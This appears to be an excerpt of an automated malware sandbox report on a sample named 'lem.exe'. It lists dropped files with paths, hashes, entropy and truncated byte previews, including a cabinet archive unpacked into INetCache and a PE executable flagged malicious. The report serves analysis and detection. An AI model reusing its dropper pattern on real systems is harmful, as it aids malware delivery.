                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e99219bc-40f9-4a41-8a8f-cc421c3df9cd.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44063
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090490549036212
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6Of2tbzy70FqHoPFkGoup1Xl3jVa:z/Ps+wsI7ynE46Otbz8hu3VlXr4CRo5
                                                                                                                                                                                                                                                                                                  MD5:92264020E071F6DB6194E9B6F393F397
                                                                                                                                                                                                                                                                                                  SHA1:1C9E4E9E91ECC2399E5C5FC1EAAB5CF22C8DD914
                                                                                                                                                                                                                                                                                                  SHA-256:35E1BAEE49D0FB7D8857379BB56804AFCB315CB98509AC09057843B7721205B5
                                                                                                                                                                                                                                                                                                  SHA-512:1F023063C733DB717629615D0CC523C2F64806A08FC3998554E8C59BE9201E4582291BFB0A1203F68AAD060BE02C56E0D317F5549088A215B801BF6560998525
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fb3d9868-4fca-4db7-95d7-f50fb6a365bf.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44596
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096735953059218
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBVwuwhDO6vP6O2lIY89giDPFs9XFwcGoup1Xl3jVu:z/Ps+wsI7ynEn6W/83chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8503EFB3B0FEC700BBD5EB179C003218
                                                                                                                                                                                                                                                                                                  SHA1:A74CF29A9BFB3044D62F7EB7A13457C7F1DB4FAB
                                                                                                                                                                                                                                                                                                  SHA-256:B435356CE1710F4FF7B6E0FE5052AFC6EBCA38CD4512E83864B5F2D841B4D2FB
                                                                                                                                                                                                                                                                                                  SHA-512:CB6D770FD8C97CAF15F195F48C59EC8F896EE905BC7EB8887F34E7EAE4964E9E25404B26756CAB510ABCFCBDF7D8B446F8A6C274D6CA557AFA00A48589B882B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.82613732313957
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxMxl9Il8uMHRGPGEBie1jrSUlVlu3Swd1rc:mhYIRGPGreFlPbn
                                                                                                                                                                                                                                                                                                  MD5:24FA3E04BDBBCA4D92576991756B61FE
                                                                                                                                                                                                                                                                                                  SHA1:1E55B5D2700CD07B9A9FFC982ABA732EFFA7B726
                                                                                                                                                                                                                                                                                                  SHA-256:BD398E00E63285FA33CCE4863AB5EC2664B788F10B84A6F93991F2D9882E84A2
                                                                                                                                                                                                                                                                                                  SHA-512:27337AA9F933A05028B60139EC27C4BD04DE5ED56BF232141E7EFFD4BBB81C0CEB5BB2EE98ABCCE6C815D0E0E91F4EE5D8E0585E0F9D6375C6A6DDB0476474D9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.F.C.y.J.C.1.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.4.S.F.5.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.996582550968713
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:+YIAX09p3K/NSnlqj2EwMgfDfdBgNPHywqy:++KJnEwMgfJBgNaNy
                                                                                                                                                                                                                                                                                                  MD5:952A8F5EA4B1F8043C923EFBCDC816AC
                                                                                                                                                                                                                                                                                                  SHA1:9502B0F0F9F01426B3982D819AAB9EF57CE3469E
                                                                                                                                                                                                                                                                                                  SHA-256:BD1D0EEAABA223ACC81627C2F4081CB9A8088369E471D35452DD01AC2BB7EA9A
                                                                                                                                                                                                                                                                                                  SHA-512:6DBCA5087447EC32364C2FC51FAF8D85678CAF6000CE070A75E42F709C3C60E1A95F13E867E2EA63C8BD19574CC85514FA60B8E22733F95D45F9438398A63D04
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.U.A.3.C.i.V.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.4.S.F.5.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8920008575661664
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xmxl9Il8uMHdRw90sQfgizeT6Jy0x6k5arSY16OMJd/vc:asYIk0sQB8k2fQo
                                                                                                                                                                                                                                                                                                  MD5:807D3B63ABCB54A86802198F5041D12E
                                                                                                                                                                                                                                                                                                  SHA1:94C1350B103B486DB04EBC6EF9B6E086B96B9D43
                                                                                                                                                                                                                                                                                                  SHA-256:15B1E2A90D24ADDF54AE1FB83506FE5775137D73502066A7C5714A5E7D3434DC
                                                                                                                                                                                                                                                                                                  SHA-512:8AFE2DCAAB7A4333F652103BBBD7C4BDF270EF9AC444D87C4E9D6A3A414BA67CDD55E9803213A9ABF13C5AF67E41C4969ED9BFD25AD583DE529386EFC7081518
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:."./.O.J.0.O.v.Z.2.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.4.S.F.5.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):947288
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\m

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):271120
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9993557269020155
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:Gc4RvoyV4vGzMoN0npS8nqWhvoSTK4mXomqX8Ih:YRvgoN01rh5K4gqX5h
                                                                                                                                                                                                                                                                                                  MD5:37042197E6ED0CED3E18E3049135E2E5
                                                                                                                                                                                                                                                                                                  SHA1:26B16A34CB5646551C53C2CD45209F4237B06BE2
                                                                                                                                                                                                                                                                                                  SHA-256:537914B1D5A23203831B93E943BFD9C74DC117AB8D84DE22D37CA7EA2F8F8288
                                                                                                                                                                                                                                                                                                  SHA-512:588185840D638A0C6F167FCFAFCC64DC831D9E5A2A0AB69D8C8B201C4B905CA5DA412D908C1A00B50453259FD5B9DAC63C4376E086B26180B51A066BB714D51D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:b...W....Vg.....c..@...\B...7....$..Z.=....a5d.;.....`.k..4K...i..............-...A"....vHD....p+.won5c..t.i*W....'X.F..R..s.=........Dv;.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.F.'.F...h..............X..<2...X..<2..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t.P..,P..Myn.2..t.W....$....D...F...X...g...X..<2..m.........8.5...x..2).U.j....r>.v".].w...)...hG..}.k..-...N.2...)<.G..G...c.'.t.&f/]._2..GR.._...?X.1}.O N......`2r...V.3.Y3.mr....3...Ns...?.j...k...]..?..Y.tP#.K..L............s..*l.Qq:.....Z.V.:.4.....Wer=...k.{%..&..#k,F...(.5..h..?7..... ..,H.m. ......4..~r>-..6.O......<cWk.3"....-k.c../.i../s.UYGzs!..Z.Z...........F..Dr.J...=[..0......[...= ...S...&\..o.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Authorization

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):487443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998124391538459
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:B+S9oU3XWMHVIx884xmjdmLlSM7DGRgpqb7ITX:AeoUnW1xbAlSM3BpqATX
                                                                                                                                                                                                                                                                                                  MD5:3E6C9EC6F7CFD6FF9E44415233734692
                                                                                                                                                                                                                                                                                                  SHA1:C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE
                                                                                                                                                                                                                                                                                                  SHA-256:59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
                                                                                                                                                                                                                                                                                                  SHA-512:4467EDF1AEE44166B6D7356E3A4C91AF1F38C6934F06EC6C63EA778E96190061F05759C9AC2366AA364A35AFDBE1ED6478AFAFAC7A62EA9BA3CC153AA2E35518
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MSCF.....p......,................ ..6..................YN- .Proceedings..X.........YN- .Recovery..X...L.....YN- .Sunglasses............YN- .Division...........YN- .Cultural...........YN- .Tulsa...........YN- .Being...........YN- .Name...........YN- .Subtle.....[......YN- .Silicon.....[|.....YN- .Webster.....S..CK..T..8|7{......`.Q.....&.h..MP..Cv...*.q.O.v%VB.w.2...-*V.bl.}hK.JP...IP...FB5V.3qS..a...=..M.}.....x.s..33g.93.+Is.........W.I..)A.z..|I...........b..&.....a$.],IU5.p.....!.qLy.Rvf..b.+'b.-f.|T=.._0.8>....-F./....Pc$L].9~..+..k?..{0a.%.1. ...!.;...R....x..F..u..E..1g.9....9....9.s.j......6...8^ ..4.FI...`b<)E...b..I.e>.*.Q..`.'YD.%.m0!....RR.6h.'..*J.....qG.$.A./P.......~=..{...o..'HR.I...(K...-P...$..,.`..M..j.C...z..A.....)&u#.X .u....!...J....4I.V...^....P.......*..3...?.B[..G.d...Oa>.[ge...Kc......$..J..,X....|../...3....1.b.Z.\.k.H...q.......C..Y..-..:....K.Q..n...EM.3.....-.Y..m<...6.................!..S...J.a.}..%=G...L.n..P

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Being

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):68608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.767683978790837
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Ov2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08Qukl6:+2jfTq8QLeAg0Fuz08X5
                                                                                                                                                                                                                                                                                                  MD5:D562AC74A5D84C5F5418FE566482E0A6
                                                                                                                                                                                                                                                                                                  SHA1:86694D56F1571999F19E56C3143680B49866DDE8
                                                                                                                                                                                                                                                                                                  SHA-256:CCBDCE2D5D2EE43E6B214CD363E32DFBE2B14A9100DE6A179BE7B3C6D4CDAF24
                                                                                                                                                                                                                                                                                                  SHA-512:1E3466B2C2D23741A0CD9DB3CC594D9529C8660AC05311708606EE9809F16D67AC2B072CF0E2D423FE02A6E867A13043400064D0860B63D0C3A0BC1E855DD62A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:..I.[.I...I.U..QQSVW.U..0^L..M.3......;.u.R....(..Y..t..U..M....^L.G..F..u..._^[.....U..QQSVW..y........f..toj]...E.\...^.E.[......f;U.u...q.j]Xf;.t.j\Xf;u.u.j]...^.)f;U.u.f9y.t*j[X....j]^...f;.t.f;.u.f9q.t.........f..u.3._^[..3...@..U..SV.u...W.....N.;.r.j..u....u..X'.......t..6..u.3.@_^[].3...SV... ..W.N<.<.;.~...;.}Y..+...d|P..?P......Y..u.j..>.F<..P.v.S.K]...F ...+F....~<......C.F ~..v..T...Y.^.3..~<..jHX_^[..NL.....B..u.8.t.I.........L..U....SV....U.W.E.q.3..}.......................I..$..I..u.3.......u.f;.U..u......F.................jw.}._..F..4Ff9>t.}.....E..y...E...;.......jwYf;...........h....}....^....]...N.jw_.C...H....A...Af99t.}.;.v.;...9....M.....t.9P.t.....u..........E.M.PS.u..U..J..U....................}..P...jw_..F..4Ff9>t..9.....F.....1L...4N.........1L..4F....G....}...}.......f.F......f#......f;................F..........F.....F..}....t....uL....G...G.}....pu...F...j.X.4F.......br+..gv4..iv...lv*..mu...F.f;F.u....}.........G.....j...j........j

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cohen

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (944), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25102
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.113247807478338
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:CLr7xw9jD6bo12DAZS4Mt0TuJuZ7kwsFZLfUwfZfLPX2to8rD6r:kXUjDt12s0BiuJuZIw0ZLffhfDK1r8
                                                                                                                                                                                                                                                                                                  MD5:15B3F5F2D363D4D3BC645E1261EE7E5B
                                                                                                                                                                                                                                                                                                  SHA1:AB35B1C8CB947A415C033AC8973137472C21F627
                                                                                                                                                                                                                                                                                                  SHA-256:FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
                                                                                                                                                                                                                                                                                                  SHA-512:5316C823881AD73C85F00A8C78398C485341488B36E4256C7E553AC06EDE4AA682C91AA5607D1AF5B7871C429B5519911C99D3AFE313EE5A93BF1648E814C998
                                                                                                                                                                                                                                                                                                  Malicious:false
